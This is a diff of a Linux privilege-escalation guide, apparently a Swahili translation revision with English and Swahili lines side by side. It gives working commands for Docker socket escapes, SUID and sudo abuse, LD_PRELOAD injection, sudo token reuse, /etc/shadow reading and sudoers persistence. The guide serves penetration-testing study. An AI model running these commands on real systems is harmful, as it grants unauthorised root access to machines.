- `Service`: Inaelezea jina la **kitengo cha huduma** **kuanzisha** kwenye **trafiki inayokuja**. Mpangilio huu unaruhusiwa tu kwa sockets zenye Accept=no. Inarudi kwa huduma ambayo ina jina sawa na socket (ikiwa na kiambishi kilichobadilishwa). Katika hali nyingi, haitakuwa lazima kutumia chaguo hili.
 | 
			
		||||
 | 
			
		||||
### Writable .socket files
 | 
			
		||||
 | 
			
		||||
If you find a **writable** `.socket` file you can **add** at the beginning of the `[Socket]` section something like: `ExecStartPre=/home/kali/sys/backdoor` and the backdoor will be executed before the socket is created. Therefore, you will **probably need to wait until the machine is rebooted.**\
 | 
			
		||||
_Note that the system must be using that socket file configuration or the backdoor won't be executed_
 | 
			
		||||
Ikiwa unapata faili ya `.socket` inayoweza kuandikwa unaweza **kuongeza** mwanzoni mwa sehemu ya `[Socket]` kitu kama: `ExecStartPre=/home/kali/sys/backdoor` na backdoor itatekelezwa kabla ya socket kuundwa. Hivyo, **labda utahitaji kusubiri hadi mashine irebooted.**\
 | 
			
		||||
_Kumbuka kwamba mfumo lazima utumie usanidi wa faili hiyo ya socket au backdoor haitatekelezwa_
 | 
			
		||||
 | 
			
		||||
### Writable sockets
 | 
			
		||||
 | 
			
		||||
If you **identify any writable socket** (_now we are talking about Unix Sockets and not about the config `.socket` files_), then **you can communicate** with that socket and maybe exploit a vulnerability.
 | 
			
		||||
Ikiwa **unatambua socket yoyote inayoweza kuandikwa** (_sasa tunazungumzia kuhusu Unix Sockets na si kuhusu faili za usanidi `.socket`_), basi **unaweza kuwasiliana** na socket hiyo na labda kutumia udhaifu. 
 | 
			
		||||
 | 
			
		||||
### Enumerate Unix Sockets
 | 
			
		||||
```bash
 | 
			
		||||
@ -481,19 +481,19 @@ socket-command-injection.md
 | 
			
		||||
 | 
			
		||||
### Soketi za HTTP
 | 
			
		||||
 | 
			
		||||
Kumbuka kwamba kunaweza kuwa na **soketi zinazotafuta maombi ya HTTP** (_Sizungumzii kuhusu faili za .socket bali faili zinazofanya kazi kama soketi za unix_). Unaweza kuangalia hii kwa:
 | 
			
		||||
Kumbuka kwamba kunaweza kuwa na **soketi zinazotafakari maombi ya HTTP** (_Sizungumzii kuhusu faili za .socket bali faili zinazofanya kazi kama soketi za unix_). Unaweza kuangalia hii kwa:
 | 
			
		||||
```bash
 | 
			
		||||
curl --max-time 2 --unix-socket /pat/to/socket/files http:/index
 | 
			
		||||
```
 | 
			
		||||
Ikiwa soketi **inas respond na HTTP** ombi, basi unaweza **kuwasiliana** nayo na labda **kutumia udhaifu fulani**.
 | 
			
		||||
Ikiwa socket **inas respond na HTTP** ombi, basi unaweza **kuwasiliana** nayo na labda **kutumia udhaifu fulani**.
 | 
			
		||||
 | 
			
		||||
### Soketi la Docker Linaloweza Kuandikwa
 | 
			
		||||
### Socket ya Docker Inayoweza Kuandikwa
 | 
			
		||||
 | 
			
		||||
Soketi la Docker, mara nyingi hupatikana kwenye `/var/run/docker.sock`, ni faili muhimu ambayo inapaswa kulindwa. Kwa kawaida, linaweza kuandikwa na mtumiaji `root` na wanachama wa kundi la `docker`. Kuwa na ufikiaji wa kuandika kwenye soketi hii kunaweza kusababisha kupanda hadhi. Hapa kuna muhtasari wa jinsi hii inaweza kufanyika na mbinu mbadala ikiwa Docker CLI haipatikani.
 | 
			
		||||
Socket ya Docker, mara nyingi hupatikana kwenye `/var/run/docker.sock`, ni faili muhimu ambayo inapaswa kulindwa. Kwa kawaida, inaweza kuandikwa na mtumiaji `root` na wanachama wa kundi la `docker`. Kuwa na ufikiaji wa kuandika kwenye socket hii kunaweza kusababisha kupanda vyeo. Hapa kuna muhtasari wa jinsi hii inaweza kufanywa na mbinu mbadala ikiwa Docker CLI haipatikani.
 | 
			
		||||
 | 
			
		||||
#### **Kupanda Hadhi kwa Kutumia Docker CLI**
 | 
			
		||||
#### **Kupanda Vyeo kwa kutumia Docker CLI**
 | 
			
		||||
 | 
			
		||||
Ikiwa una ufikiaji wa kuandika kwenye soketi ya Docker, unaweza kupanda hadhi kwa kutumia amri zifuatazo:
 | 
			
		||||
Ikiwa una ufikiaji wa kuandika kwenye socket ya Docker, unaweza kupanda vyeo kwa kutumia amri zifuatazo:
 | 
			
		||||
```bash
 | 
			
		||||
docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
 | 
			
		||||
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
 | 
			
		||||
@ -534,7 +534,7 @@ Upgrade: tcp
 | 
			
		||||
 | 
			
		||||
After setting up the `socat` connection, you can execute commands directly in the container with root-level access to the host's filesystem.
 | 
			
		||||
 | 
			
		||||
### Others
 | 
			
		||||
### Wengine
 | 
			
		||||
 | 
			
		||||
Note that if you have write permissions over the docker socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-pe/index.html#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising).
 | 
			
		||||
 | 
			
		||||
@ -564,11 +564,11 @@ runc-privilege-escalation.md
 | 
			
		||||
 | 
			
		||||
D-Bus ni mfumo wa **mawasiliano kati ya michakato (IPC)** ambao unaruhusu programu kuingiliana kwa ufanisi na kushiriki data. Imeundwa kwa kuzingatia mfumo wa kisasa wa Linux, inatoa muundo thabiti kwa aina mbalimbali za mawasiliano ya programu.
 | 
			
		||||
 | 
			
		||||
Mfumo huu ni wa kubadilika, ukisaidia IPC ya msingi inayoboresha ubadilishanaji wa data kati ya michakato, ikikumbusha **sockets za UNIX zilizoboreshwa**. Aidha, inasaidia kutangaza matukio au ishara, ikikuza uunganisho usio na mshono kati ya vipengele vya mfumo. Kwa mfano, ishara kutoka kwa daemon ya Bluetooth kuhusu simu inayokuja inaweza kumfanya mpiga muziki akate sauti, kuboresha uzoefu wa mtumiaji. Zaidi ya hayo, D-Bus inasaidia mfumo wa vitu vya mbali, ikirahisisha maombi ya huduma na wito wa mbinu kati ya programu, ikipunguza michakato ambayo hapo awali ilikuwa ngumu.
 | 
			
		||||
Mfumo huu ni wa kubadilika, ukisaidia IPC ya msingi inayoboresha ubadilishanaji wa data kati ya michakato, ikikumbusha **sockets za UNIX zilizoboreshwa**. Aidha, inasaidia kutangaza matukio au ishara, ikikuza uunganisho usio na mshono kati ya vipengele vya mfumo. Kwa mfano, ishara kutoka kwa daemon ya Bluetooth kuhusu simu inayokuja inaweza kumfanya mpiga muziki kukatiza, ikiboresha uzoefu wa mtumiaji. Zaidi ya hayo, D-Bus inasaidia mfumo wa vitu vya mbali, ikirahisisha maombi ya huduma na wito wa mbinu kati ya programu, ikipunguza michakato ambayo hapo awali ilikuwa ngumu.
 | 
			
		||||
 | 
			
		||||
D-Bus inafanya kazi kwa **mfumo wa ruhusa/zuia**, ikisimamia ruhusa za ujumbe (wito wa mbinu, utoaji wa ishara, nk.) kulingana na athari ya jumla ya sheria za sera zinazolingana. Sera hizi zinaelezea mwingiliano na basi, na inaweza kuruhusu kupandisha mamlaka kupitia unyakuzi wa ruhusa hizi.
 | 
			
		||||
 | 
			
		||||
Mfano wa sera kama hiyo katika `/etc/dbus-1/system.d/wpa_supplicant.conf` unapatikana, ukielezea ruhusa za mtumiaji wa root kumiliki, kutuma na kupokea ujumbe kutoka `fi.w1.wpa_supplicant1`.
 | 
			
		||||
Mfano wa sera kama hiyo katika `/etc/dbus-1/system.d/wpa_supplicant.conf` unapatikana, ukielezea ruhusa za mtumiaji wa root kumiliki, kutuma, na kupokea ujumbe kutoka `fi.w1.wpa_supplicant1`.
 | 
			
		||||
 | 
			
		||||
Sera bila mtumiaji au kundi lililobainishwa zinatumika kwa ujumla, wakati sera za muktadha "default" zinatumika kwa wote ambao hawajafunikwa na sera nyingine maalum.
 | 
			
		||||
```xml
 | 
			
		||||
@ -614,7 +614,7 @@ lsof -i
 | 
			
		||||
```
 | 
			
		||||
### Open ports
 | 
			
		||||
 | 
			
		||||
Daima angalia huduma za mtandao zinazoendesha kwenye mashine ambayo hukuweza kuingiliana nayo kabla ya kuipata:
 | 
			
		||||
Daima angalia huduma za mtandao zinazofanya kazi kwenye mashine ambayo hukuweza kuingiliana nayo kabla ya kuipata:
 | 
			
		||||
```bash
 | 
			
		||||
(netstat -punta || ss --ntpu)
 | 
			
		||||
(netstat -punta || ss --ntpu) | grep "127.0"
 | 
			
		||||
@ -653,12 +653,12 @@ gpg --list-keys 2>/dev/null
 | 
			
		||||
```
 | 
			
		||||
### Big UID
 | 
			
		||||
 | 
			
		||||
Baadhi ya toleo za Linux zilipata hitilafu inayowaruhusu watumiaji wenye **UID > INT_MAX** kupandisha hadhi. Maelezo zaidi: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) na [here](https://twitter.com/paragonsec/status/1071152249529884674).\
 | 
			
		||||
**Exploiti** kwa kutumia: **`systemd-run -t /bin/bash`**
 | 
			
		||||
Baadhi ya toleo za Linux zilipata hitilafu inayowaruhusu watumiaji wenye **UID > INT_MAX** kupandisha mamlaka. Maelezo zaidi: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) na [here](https://twitter.com/paragonsec/status/1071152249529884674).\
 | 
			
		||||
**Tumia** kwa: **`systemd-run -t /bin/bash`**
 | 
			
		||||
 | 
			
		||||
### Groups
 | 
			
		||||
 | 
			
		||||
Angalia kama wewe ni **mwanachama wa kundi lolote** ambalo linaweza kukupa haki za root:
 | 
			
		||||
Angalia kama wewe ni **mwanachama wa kundi lolote** ambalo linaweza kukupa mamlaka ya root:
 | 
			
		||||
 | 
			
		||||
{{#ref}}
 | 
			
		||||
interesting-groups-linux-pe/
 | 
			
		||||
@ -694,11 +694,11 @@ Ikiwa hujali kufanya kelele nyingi na `su` na `timeout` binaries zipo kwenye kom
 | 
			
		||||
 | 
			
		||||
### $PATH
 | 
			
		||||
 | 
			
		||||
Ikiwa unapata kwamba unaweza **kuandika ndani ya folda fulani ya $PATH**, unaweza kuwa na uwezo wa kupandisha mamlaka kwa **kuunda backdoor ndani ya folda inayoweza kuandikwa** kwa jina la amri fulani ambayo itatekelezwa na mtumiaji tofauti (root kwa njia bora) na ambayo **haitapakiwa kutoka folda ambayo iko kabla** ya folda yako inayoweza kuandikwa katika $PATH.
 | 
			
		||||
Ikiwa unapata kwamba unaweza **kuandika ndani ya folda fulani ya $PATH**, unaweza kuwa na uwezo wa kupandisha mamlaka kwa **kuunda backdoor ndani ya folda inayoweza kuandikwa** kwa jina la amri fulani ambayo itatekelezwa na mtumiaji tofauti (root kwa kawaida) na ambayo **haitapakiwa kutoka folda ambayo iko kabla** ya folda yako inayoweza kuandikwa katika $PATH.
 | 
			
		||||
 | 
			
		||||
### SUDO and SUID
 | 
			
		||||
 | 
			
		||||
Unaweza kuruhusiwa kutekeleza amri fulani kwa kutumia sudo au zinaweza kuwa na suid bit. Angalia kwa kutumia:
 | 
			
		||||
Unaweza kuruhusiwa kutekeleza amri fulani kwa kutumia sudo au zinaweza kuwa na bit ya suid. Angalia kwa kutumia:
 | 
			
		||||
```bash
 | 
			
		||||
sudo -l #Check commands you can execute with sudo
 | 
			
		||||
find / -perm -4000 2>/dev/null #Find all SUID binaries
 | 
			
		||||
@ -714,7 +714,7 @@ less>! <shell_comand>
 | 
			
		||||
```
 | 
			
		||||
### NOPASSWD
 | 
			
		||||
 | 
			
		||||
Mkonfigu wa Sudo unaweza kumruhusu mtumiaji kutekeleza amri fulani kwa mamlaka ya mtumiaji mwingine bila kujua nenosiri.
 | 
			
		||||
Mkonfigu wa Sudo unaweza kumruhusu mtumiaji kutekeleza amri fulani kwa kutumia mamlaka ya mtumiaji mwingine bila kujua nenosiri.
 | 
			
		||||
```
 | 
			
		||||
$ sudo -l
 | 
			
		||||
User demo may run the following commands on crashlab:
 | 
			
		||||
@ -726,19 +726,19 @@ sudo vim -c '!sh'
 | 
			
		||||
```
 | 
			
		||||
### SETENV
 | 
			
		||||
 | 
			
		||||
Hii amri inamruhusu mtumiaji **kuweka mabadiliko ya mazingira** wakati anatekeleza kitu:
 | 
			
		||||
Hii amri inamruhusu mtumiaji **kuweka variable ya mazingira** wakati wa kutekeleza kitu:
 | 
			
		||||
```bash
 | 
			
		||||
$ sudo -l
 | 
			
		||||
User waldo may run the following commands on admirer:
 | 
			
		||||
(ALL) SETENV: /opt/scripts/admin_tasks.sh
 | 
			
		||||
```
 | 
			
		||||
Mfano huu, **unaotegemea mashine ya HTB Admirer**, ulikuwa **na udhaifu** wa **PYTHONPATH hijacking** ili kupakia maktaba ya python isiyo na mipaka wakati wa kutekeleza skripti kama root:
 | 
			
		||||
Mfano huu, **uliotokana na mashine ya HTB Admirer**, ulikuwa **na udhaifu** wa **PYTHONPATH hijacking** ili kupakia maktaba ya python isiyokuwa na mipaka wakati wa kutekeleza skripti kama root:
 | 
			
		||||
```bash
 | 
			
		||||
sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh
 | 
			
		||||
```
 | 
			
		||||
### Sudo execution bypassing paths
 | 
			
		||||
 | 
			
		||||
**Jump** kusoma faili nyingine au kutumia **symlinks**. Kwa mfano katika faili ya sudoers: _hacker10 ALL= (root) /bin/less /var/log/\*_
 | 
			
		||||
**Jump** kusoma faili nyingine au kutumia **symlinks**. Kwa mfano katika faili la sudoers: _hacker10 ALL= (root) /bin/less /var/log/\*_
 | 
			
		||||
```bash
 | 
			
		||||
sudo less /var/logs/anything
 | 
			
		||||
less>:e /etc/shadow #Jump to read other files using privileged less
 | 
			
		||||
@ -755,7 +755,7 @@ sudo less /var/log/something /etc/shadow #Red 2 files
 | 
			
		||||
```
 | 
			
		||||
**Countermeasures**: [https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/](https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/)
 | 
			
		||||
 | 
			
		||||
### Amri ya Sudo/SUID bila njia ya amri
 | 
			
		||||
### Amri ya Sudo/SUID binary bila njia ya amri
 | 
			
		||||
 | 
			
		||||
Ikiwa **idhini ya sudo** imetolewa kwa amri moja **bila kubainisha njia**: _hacker10 ALL= (root) less_ unaweza kuitumia kwa kubadilisha mabadiliko ya PATH
 | 
			
		||||
```bash
 | 
			
		||||
@ -763,7 +763,7 @@ export PATH=/tmp:$PATH
 | 
			
		||||
#Put your backdoor in /tmp and name it "less"
 | 
			
		||||
sudo less
 | 
			
		||||
```
 | 
			
		||||
H technique hii inaweza pia kutumika ikiwa **suid** binary **inaendesha amri nyingine bila kubainisha njia yake (daima angalia na** _**strings**_ **maudhui ya binary ya SUID isiyo ya kawaida)**.
 | 
			
		||||
H technique hii inaweza pia kutumika ikiwa **suid** binary **inaendesha amri nyingine bila kubainisha njia yake (daima angalia na** _**strings**_ **maudhui ya SUID binary isiyo ya kawaida)**.
 | 
			
		||||
 | 
			
		||||
[Payload examples to execute.](payloads-to-execute.md)
 | 
			
		||||
 | 
			
		||||
@ -776,7 +776,7 @@ Kwa mfano, ikiwa binary ya suid inaita _**/usr/sbin/service apache2 start**_ una
 | 
			
		||||
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
 | 
			
		||||
export -f /usr/sbin/service
 | 
			
		||||
```
 | 
			
		||||
Kisha, unapoitwa binary ya suid, kazi hii itatekelezwa
 | 
			
		||||
Kisha, unapoitisha binary ya suid, kazi hii itatekelezwa
 | 
			
		||||
 | 
			
		||||
### LD_PRELOAD & **LD_LIBRARY_PATH**
 | 
			
		||||
 | 
			
		||||
@ -785,9 +785,9 @@ Kigezo cha mazingira **LD_PRELOAD** kinatumika kubaini maktaba moja au zaidi za
 | 
			
		||||
Hata hivyo, ili kudumisha usalama wa mfumo na kuzuia kipengele hiki kutumika vibaya, hasa na **suid/sgid** executable, mfumo unatekeleza masharti fulani:
 | 
			
		||||
 | 
			
		||||
- Loader inapuuzilia mbali **LD_PRELOAD** kwa executable ambapo kitambulisho halisi cha mtumiaji (_ruid_) hakilingani na kitambulisho cha mtumiaji kinachofanya kazi (_euid_).
 | 
			
		||||
- Kwa executable zenye suid/sgid, maktaba tu katika njia za kawaida ambazo pia ni suid/sgid zinapakiwa kabla.
 | 
			
		||||
- Kwa executable zenye suid/sgid, maktaba tu katika njia za kawaida ambazo pia ni suid/sgid ndizo zinazopakiwa kabla.
 | 
			
		||||
 | 
			
		||||
Kuongezeka kwa mamlaka kunaweza kutokea ikiwa una uwezo wa kutekeleza amri kwa kutumia `sudo` na matokeo ya `sudo -l` yanajumuisha taarifa **env_keep+=LD_PRELOAD**. Mipangilio hii inaruhusu kigezo cha mazingira **LD_PRELOAD** kudumu na kutambuliwa hata wakati amri zinapotekelezwa kwa kutumia `sudo`, ambayo inaweza kusababisha utekelezaji wa msimbo usio na mipaka kwa mamlaka yaliyoongezeka.
 | 
			
		||||
Kuongezeka kwa mamlaka kunaweza kutokea ikiwa una uwezo wa kutekeleza amri kwa kutumia `sudo` na matokeo ya `sudo -l` yanajumuisha taarifa **env_keep+=LD_PRELOAD**. Mipangilio hii inaruhusu kigezo cha mazingira **LD_PRELOAD** kudumu na kutambuliwa hata wakati amri zinapotekelezwa kwa `sudo`, ambayo inaweza kusababisha utekelezaji wa msimbo usio na mipaka kwa mamlaka yaliyoongezeka.
 | 
			
		||||
```
 | 
			
		||||
Defaults        env_keep += LD_PRELOAD
 | 
			
		||||
```
 | 
			
		||||
@ -809,7 +809,7 @@ Kisha **jumuisha** kwa kutumia:
 | 
			
		||||
cd /tmp
 | 
			
		||||
gcc -fPIC -shared -o pe.so pe.c -nostartfiles
 | 
			
		||||
```
 | 
			
		||||
Hatimaye, **panda mamlaka** ukikimbia
 | 
			
		||||
Hatimaye, **panda mamlaka** ukifanya
 | 
			
		||||
```bash
 | 
			
		||||
sudo LD_PRELOAD=./pe.so <COMMAND> #Use any command you can run with sudo
 | 
			
		||||
```
 | 
			
		||||
@ -892,9 +892,9 @@ hii inamaanisha kwamba maktaba uliyounda inahitaji kuwa na kazi inayoitwa `a_fun
 | 
			
		||||
 | 
			
		||||
### GTFOBins
 | 
			
		||||
 | 
			
		||||
[**GTFOBins**](https://gtfobins.github.io) ni orodha iliyochaguliwa ya Unix binaries ambazo zinaweza kutumiwa na mshambuliaji ili kupita vizuizi vya usalama wa ndani. [**GTFOArgs**](https://gtfoargs.github.io/) ni sawa lakini kwa kesi ambapo unaweza **tu kuingiza hoja** katika amri.
 | 
			
		||||
[**GTFOBins**](https://gtfobins.github.io) ni orodha iliyochaguliwa ya binaries za Unix ambazo zinaweza kutumiwa na mshambuliaji ili kupita vizuizi vya usalama wa ndani. [**GTFOArgs**](https://gtfoargs.github.io/) ni sawa lakini kwa kesi ambapo unaweza **tu kuingiza hoja** katika amri.
 | 
			
		||||
 | 
			
		||||
Mradi huu unakusanya kazi halali za Unix binaries ambazo zinaweza kutumiwa vibaya kuvunja shell zilizozuiliwa, kupandisha au kudumisha haki za juu, kuhamasisha faili, kuzalisha shell za bind na reverse, na kuwezesha kazi nyingine za baada ya unyakuzi.
 | 
			
		||||
Mradi huu unakusanya kazi halali za binaries za Unix ambazo zinaweza kutumiwa vibaya kuvunja nje ya shells zilizozuiliwa, kupandisha au kudumisha haki za juu, kuhamasisha faili, kuzalisha bind na reverse shells, na kuwezesha kazi nyingine za baada ya unyakuzi.
 | 
			
		||||
 | 
			
		||||
> gdb -nx -ex '!sh' -ex quit\
 | 
			
		||||
> sudo mysql -e '! /bin/sh'\
 | 
			
		||||
@ -915,7 +915,7 @@ Ikiwa unaweza kufikia `sudo -l` unaweza kutumia chombo [**FallOfSudo**](https://
 | 
			
		||||
 | 
			
		||||
### Kuendelea Kutumia Token za Sudo
 | 
			
		||||
 | 
			
		||||
Katika kesi ambapo una **sudo access** lakini si nenosiri, unaweza kupandisha haki kwa **kusubiri utekelezaji wa amri ya sudo kisha kuingilia kati token ya kikao**.
 | 
			
		||||
Katika kesi ambapo una **ufikiaji wa sudo** lakini si nenosiri, unaweza kupandisha haki kwa **kusubiri utekelezaji wa amri ya sudo kisha kuingilia kati token ya kikao**.
 | 
			
		||||
 | 
			
		||||
Mahitaji ya kupandisha haki:
 | 
			
		||||
 | 
			
		||||
@ -928,7 +928,7 @@ Mahitaji ya kupandisha haki:
 | 
			
		||||
 | 
			
		||||
Ikiwa mahitaji haya yote yanakidhi, **unaweza kupandisha haki kwa kutumia:** [**https://github.com/nongiach/sudo_inject**](https://github.com/nongiach/sudo_inject)
 | 
			
		||||
 | 
			
		||||
- **kuvunjwa kwa kwanza** (`exploit.sh`) kutaunda binary `activate_sudo_token` katika _/tmp_. Unaweza kuitumia **kuamsha token ya sudo katika kikao chako** (hutaweza kupata shell ya root moja kwa moja, fanya `sudo su`):
 | 
			
		||||
- **unyakuzi wa kwanza** (`exploit.sh`) utaunda binary `activate_sudo_token` katika _/tmp_. Unaweza kuitumia **kuamsha token ya sudo katika kikao chako** (hutaweza kupata shell ya root moja kwa moja, fanya `sudo su`):
 | 
			
		||||
```bash
 | 
			
		||||
bash exploit.sh
 | 
			
		||||
/tmp/activate_sudo_token
 | 
			
		||||
@ -947,7 +947,7 @@ sudo su
 | 
			
		||||
### /var/run/sudo/ts/\<Username>
 | 
			
		||||
 | 
			
		||||
Ikiwa una **idhini za kuandika** katika folda au kwenye faili zozote zilizoundwa ndani ya folda hiyo unaweza kutumia binary [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools) ili **kuunda token ya sudo kwa mtumiaji na PID**.\
 | 
			
		||||
Kwa mfano, ikiwa unaweza kufuta faili _/var/run/sudo/ts/sampleuser_ na una shell kama mtumiaji huyo mwenye PID 1234, unaweza **kupata mamlaka ya sudo** bila kuhitaji kujua nenosiri kwa kufanya:
 | 
			
		||||
Kwa mfano, ikiwa unaweza kufuta faili _/var/run/sudo/ts/sampleuser_ na una shell kama mtumiaji huyo mwenye PID 1234, unaweza **kupata haki za sudo** bila kuhitaji kujua nenosiri kwa kufanya:
 | 
			
		||||
```bash
 | 
			
		||||
./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser
 | 
			
		||||
```
 | 
			
		||||
@ -973,7 +973,7 @@ echo "Defaults timestamp_timeout=-1" >> /etc/sudoers.d/win
 | 
			
		||||
```
 | 
			
		||||
### DOAS
 | 
			
		||||
 | 
			
		||||
Kuna mbadala kadhaa ya `sudo` binary kama `doas` kwa OpenBSD, kumbuka kuangalia usanidi wake katika `/etc/doas.conf`
 | 
			
		||||
Kuna mbadala kadhaa ya binary ya `sudo` kama `doas` kwa OpenBSD, kumbuka kuangalia usanidi wake katika `/etc/doas.conf`
 | 
			
		||||
```
 | 
			
		||||
permit nopass demo as root cmd vim
 | 
			
		||||
```
 | 
			
		||||
@ -981,7 +981,7 @@ permit nopass demo as root cmd vim
 | 
			
		||||
 | 
			
		||||
Ikiwa unajua kwamba **mtumiaji kwa kawaida huungana na mashine na hutumia `sudo`** kuongeza mamlaka na umepata shell ndani ya muktadha wa mtumiaji huyo, unaweza **kuunda executable mpya ya sudo** ambayo itatekeleza msimbo wako kama root na kisha amri ya mtumiaji. Kisha, **badilisha $PATH** wa muktadha wa mtumiaji (kwa mfano kuongeza njia mpya katika .bash_profile) ili wakati mtumiaji anapotekeleza sudo, executable yako ya sudo itatekelezwa.
 | 
			
		||||
 | 
			
		||||
Kumbuka kwamba ikiwa mtumiaji anatumia shell tofauti (sio bash) utahitaji kubadilisha faili nyingine ili kuongeza njia mpya. Kwa mfano[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) inabadilisha `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. Unaweza kupata mfano mwingine katika [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py)
 | 
			
		||||
Kumbuka kwamba ikiwa mtumiaji anatumia shell tofauti (sio bash) utahitaji kubadilisha faili nyingine kuongeza njia mpya. Kwa mfano[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) inabadilisha `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. Unaweza kupata mfano mwingine katika [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py)
 | 
			
		||||
 | 
			
		||||
Au kuendesha kitu kama:
 | 
			
		||||
```bash
 | 
			
		||||
@ -1002,7 +1002,7 @@ sudo ls
 | 
			
		||||
 | 
			
		||||
### ld.so
 | 
			
		||||
 | 
			
		||||
Faili `/etc/ld.so.conf` inaonyesha **mahali ambapo faili za usanidi zilizoloadiwa zinatoka**. Kawaida, faili hii ina njia ifuatayo: `include /etc/ld.so.conf.d/*.conf`
 | 
			
		||||
Faili `/etc/ld.so.conf` inaonyesha **mahali ambapo faili za usanidi zilizopakiwa zinatoka**. Kawaida, faili hii ina njia ifuatayo: `include /etc/ld.so.conf.d/*.conf`
 | 
			
		||||
 | 
			
		||||
Hii inamaanisha kwamba faili za usanidi kutoka `/etc/ld.so.conf.d/*.conf` zitasomwa. Faili hizi za usanidi **zinaelekeza kwenye folda nyingine** ambapo **maktaba** zitatafutwa. Kwa mfano, maudhui ya `/etc/ld.so.conf.d/libc.conf` ni `/usr/local/lib`. **Hii inamaanisha kwamba mfumo utafuta maktaba ndani ya `/usr/local/lib`**.
 | 
			
		||||
 | 
			
		||||
@ -1075,14 +1075,14 @@ setfacl -b file.txt #Remove the ACL of the file
 | 
			
		||||
```bash
 | 
			
		||||
getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null
 | 
			
		||||
```
 | 
			
		||||
## Open shell sessions
 | 
			
		||||
## Fungua vikao vya shell
 | 
			
		||||
 | 
			
		||||
Katika **toleo za zamani** unaweza **kuchukua** baadhi ya **session** za **shell** za mtumiaji mwingine (**root**).\
 | 
			
		||||
Katika **toleo za hivi karibuni** utaweza **kuungana** na session za screen tu za **mtumiaji wako mwenyewe**. Hata hivyo, unaweza kupata **habari za kuvutia ndani ya session**.
 | 
			
		||||
Katika **toleo za zamani** unaweza **kudhibiti** baadhi ya **vikao** vya mtumiaji tofauti (**root**).\
 | 
			
		||||
Katika **toleo za hivi karibuni** utaweza **kuungana** na vikao vya skrini tu vya **mtumiaji wako mwenyewe**. Hata hivyo, unaweza kupata **habari za kuvutia ndani ya kikao**.
 | 
			
		||||
 | 
			
		||||
### screen sessions hijacking
 | 
			
		||||
### kudhibiti vikao vya skrini
 | 
			
		||||
 | 
			
		||||
**Orodha ya session za screen**
 | 
			
		||||
**Orodha ya vikao vya skrini**
 | 
			
		||||
```bash
 | 
			
		||||
screen -ls
 | 
			
		||||
screen -ls <username>/ # Show another user' screen sessions
 | 
			
		||||
@ -1097,7 +1097,7 @@ screen -x [user]/[session id]
 | 
			
		||||
```
 | 
			
		||||
## tmux sessions hijacking
 | 
			
		||||
 | 
			
		||||
Hii ilikuwa shida na **matoleo ya zamani ya tmux**. Sikuweza kuingilia kikao cha tmux (v2.1) kilichoundwa na root kama mtumiaji asiye na mamlaka.
 | 
			
		||||
Hii ilikuwa shida na **matoleo ya zamani ya tmux**. Sikuweza kuhamasisha kikao cha tmux (v2.1) kilichoundwa na root kama mtumiaji asiye na mamlaka.
 | 
			
		||||
 | 
			
		||||
**Orodha ya vikao vya tmux**
 | 
			
		||||
```bash
 | 
			
		||||
@ -1117,33 +1117,33 @@ rw-rw---- 1 root devs 0 Sep  1 06:27 /tmp/dev_sess #In this case root and devs c
 | 
			
		||||
# If you are root or devs you can access it
 | 
			
		||||
tmux -S /tmp/dev_sess attach -t 0 #Attach using a non-default tmux socket
 | 
			
		||||
```
 | 
			
		||||
Check **Valentine box from HTB** for an example.
 | 
			
		||||
Angalia **Valentine box kutoka HTB** kwa mfano.
 | 
			
		||||
 | 
			
		||||
## SSH
 | 
			
		||||
 | 
			
		||||
### Debian OpenSSL Predictable PRNG - CVE-2008-0166
 | 
			
		||||
 | 
			
		||||
Mfunguo wote wa SSL na SSH ulioanzishwa kwenye mifumo ya msingi ya Debian (Ubuntu, Kubuntu, nk) kati ya Septemba 2006 na Mei 13, 2008 unaweza kuathiriwa na hitilafu hii.\
 | 
			
		||||
Hitilafu hii inasababishwa wakati wa kuunda funguo mpya za ssh katika mifumo hiyo, kwani **mabadiliko 32,768 pekee yalikuwa yanawezekana**. Hii inamaanisha kwamba uwezekano wote unaweza kuhesabiwa na **ikiwa una funguo ya umma ya ssh unaweza kutafuta funguo ya faragha inayolingana**. Unaweza kupata uwezekano uliohesabiwa hapa: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)
 | 
			
		||||
Hitilafu hii inasababishwa wakati wa kuunda funguo mpya za ssh katika mifumo hiyo, kwani **mabadiliko 32,768 pekee yalikuwa yanawezekana**. Hii inamaanisha kwamba uwezekano wote unaweza kuhesabiwa na **ikiwa una funguo ya umma ya ssh unaweza kutafuta funguo ya kibinafsi inayolingana**. Unaweza kupata uwezekano uliohesabiwa hapa: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)
 | 
			
		||||
 | 
			
		||||
### SSH Interesting configuration values
 | 
			
		||||
### SSH Thamani za usanidi zinazovutia
 | 
			
		||||
 | 
			
		||||
- **PasswordAuthentication:** Inaeleza ikiwa uthibitishaji wa nenosiri unaruhusiwa. Kiwango cha kawaida ni `no`.
 | 
			
		||||
- **PubkeyAuthentication:** Inaeleza ikiwa uthibitishaji wa funguo za umma unaruhusiwa. Kiwango cha kawaida ni `yes`.
 | 
			
		||||
